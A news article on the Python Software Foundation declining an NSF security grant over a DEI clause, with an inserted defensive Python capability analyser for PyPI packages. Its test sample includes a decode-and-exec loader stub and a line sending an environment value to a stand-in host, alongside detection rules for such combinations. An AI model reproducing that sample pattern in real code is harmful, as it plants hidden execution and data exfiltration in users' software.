Python Foundation Rejects US Security Grant

Summary
– The Python Software Foundation rejected a $1.5 million government grant due to restrictive conditions that conflicted with its mission.
– The grant would have funded automated proactive security tools for Python packages on PyPI to replace the current reactive-only review system.
– The rejected terms would have prohibited the PSF from operating any diversity, equity, and inclusion programs during the grant period.
– The PSF Board unanimously withdrew the application because the DEI restriction directly contradicted its mission to support a diverse programming community.
– The foundation now plans to raise equivalent funding through community donations, sponsorships, and alternative grants.
The Python Software Foundation has declined a substantial $1.5 million grant from the United States government, citing contractual terms that directly conflicted with its core mission and values. In an official statement released Monday, the non-profit organization explained that accepting the funds would have required it to abandon its commitment to diversity, equity, and inclusion initiatives.
Loren Crary, the PSF’s Deputy Executive Director, detailed that the foundation had originally submitted a proposal in January 2025 to the National Science Foundation. The project fell under the Safety, Security, and Privacy of Open Source Ecosystems program. Its primary objective was to develop advanced tools for an automated, proactive review system for all packages uploaded to the Python Package Index (PyPI). This would represent a major shift from the current reactive review model. The planned tools would utilize capability analysis, built upon a dataset of known malware, to identify potential threats before they could cause harm.
Beyond securing the PyPI ecosystem, the outputs from this initiative were designed to be broadly applicable. Other major open-source software registries, including npm and crates.io, could potentially adopt these security enhancements, thereby strengthening the entire open-source software landscape. A portion of the grant was also intended to support the foundation’s general operational costs.
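To make the "capability analysis" idea concrete: a proactive reviewer does not wait for a report about a package; it inspects what uploaded code is able to do (open network connections, spawn processes, decode and execute hidden payloads, read the environment) and escalates risky combinations. The following is an added illustration written for this article, not the PSF's or PyPI's tooling. The capability map, the escalation policy, and both sample modules are constructed for the example; the samples are only parsed, never executed, and the "suspicious" one contains a placeholder string rather than any real payload.

```python
"""Static capability analysis over Python source (added example, constructed).

A capability is a coarse label such as "network" or "dynamic-code". We walk
the AST, record which capabilities a module reaches for and why, then apply
a small escalation policy. A real system would derive the map and policy
from a corpus of known-malicious uploads; here both are hand-written.
"""
import ast
from dataclasses import dataclass, field

# Hypothetical capability map: (module, attribute or None) -> label.
CAPABILITY_MAP = {
    ("socket", None): "network",
    ("urllib.request", None): "network",
    ("requests", None): "network",
    ("subprocess", None): "process",
    ("os", "system"): "process",
    ("os", "popen"): "process",
    ("base64", "b64decode"): "decode",
    ("builtins", "exec"): "dynamic-code",
    ("builtins", "eval"): "dynamic-code",
    ("os", "environ"): "env-read",
}

# Constructed escalation policy: capability sets that warrant a human look.
SUSPICIOUS_COMBOS = [
    ({"decode", "dynamic-code"}, "decodes and executes hidden code"),
    ({"env-read", "network"}, "reads environment and talks to the network"),
    ({"process", "network"}, "spawns processes and talks to the network"),
]


@dataclass
class Report:
    capabilities: set = field(default_factory=set)
    findings: list = field(default_factory=list)     # "line N: evidence -> label"
    escalations: list = field(default_factory=list)  # policy reasons that matched


class CapabilityVisitor(ast.NodeVisitor):
    def __init__(self):
        self.report = Report()
        self.module_aliases = {}  # local name -> module path (import X [as Y])
        self.name_bindings = {}   # local name -> (module, attr) (from X import Y)

    def _add(self, cap, node, evidence):
        self.report.capabilities.add(cap)
        self.report.findings.append(f"line {node.lineno}: {evidence} -> {cap}")

    def visit_Import(self, node):
        for alias in node.names:
            # "import a.b" binds the top-level name "a"; "import a.b as c" binds "c".
            top = alias.name.split(".")[0]
            self.module_aliases[alias.asname or top] = alias.name if alias.asname else top
            cap = CAPABILITY_MAP.get((alias.name, None))
            if cap:
                self._add(cap, node, f"import {alias.name}")
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        mod = node.module or ""
        for alias in node.names:
            self.name_bindings[alias.asname or alias.name] = (mod, alias.name)
            cap = CAPABILITY_MAP.get((mod, alias.name)) or CAPABILITY_MAP.get((mod, None))
            if cap:
                self._add(cap, node, f"from {mod} import {alias.name}")
        self.generic_visit(node)

    def visit_Call(self, node):
        # Bare-name calls: builtins like exec()/eval(), or names bound by "from X import Y".
        if isinstance(node.func, ast.Name):
            key = self.name_bindings.get(node.func.id, ("builtins", node.func.id))
            cap = CAPABILITY_MAP.get(key)
            if cap:
                self._add(cap, node, f"call {node.func.id}()")
        self.generic_visit(node)

    def visit_Attribute(self, node):
        # Covers both "os.system(...)" and non-call access such as "os.environ".
        if isinstance(node.value, ast.Name):
            mod = self.module_aliases.get(node.value.id)
            if mod:
                cap = CAPABILITY_MAP.get((mod, node.attr))
                if cap:
                    self._add(cap, node, f"access {mod}.{node.attr}")
        self.generic_visit(node)


def analyze_source(source: str, filename: str = "<module>") -> Report:
    """Parse one module and return its capabilities plus any policy escalations."""
    visitor = CapabilityVisitor()
    visitor.visit(ast.parse(source, filename=filename))
    report = visitor.report
    for combo, reason in SUSPICIOUS_COMBOS:
        if combo <= report.capabilities:
            report.escalations.append(reason)
    return report


# Constructed samples. They are analysed as text and never imported or run.
BENIGN_SAMPLE = """
import json

def load(path):
    with open(path) as f:
        return json.load(f)
"""

SUSPICIOUS_SAMPLE = """
import os, base64
import urllib.request as ur

def setup():
    blob = "PLACEHOLDER-NOT-A-REAL-PAYLOAD"
    exec(base64.b64decode(blob))
    ur.urlopen("http://example.invalid/?t=" + os.environ.get("HOME", ""))
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        r = analyze_source(src, name)
        print(name, sorted(r.capabilities), r.escalations)
        for line in r.findings:
            print("  ", line)
```

The point of the escalation step is that no single capability is damning (plenty of legitimate packages decode base64 or call `subprocess`); it is the combination, weighed against what has been seen in known-malicious uploads, that makes a proactive review useful while keeping false positives manageable.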
However, after the proposal was accepted, the PSF was presented with the grant’s specific terms and conditions. These included a clause prohibiting the foundation from operating any programs that “advance or promote DEI” for the entire duration of the financial award. This restriction would have applied to all of the PSF’s activities. Critically, any violation of this term would grant the NSF the right to demand the return of all transferred funds, even if they had already been spent.
Faced with this stipulation, the foundation’s Board of Directors held a unanimous vote to withdraw its application. The decision was rooted in the fundamental conflict between the grant’s conditions and the PSF’s official mission, which is to “promote, protect, and advance the Python programming language, and to support and facilitate the growth of a diverse and international community of Python programmers.”
This is not an isolated case in the tech non-profit world. Earlier this year, The Carpentries, an organization that teaches coding and data science to researchers globally, made an identical choice for precisely the same reason, rejecting a grant with similar restrictive language concerning DEI programs.
Looking forward, the Python Software Foundation is now seeking alternative funding avenues. The organization hopes to raise an equivalent amount, either partially or in full, through direct donations from the programming community, corporate sponsorships, and other grant opportunities that align with its foundational principles.
(Source: HelpNet Security)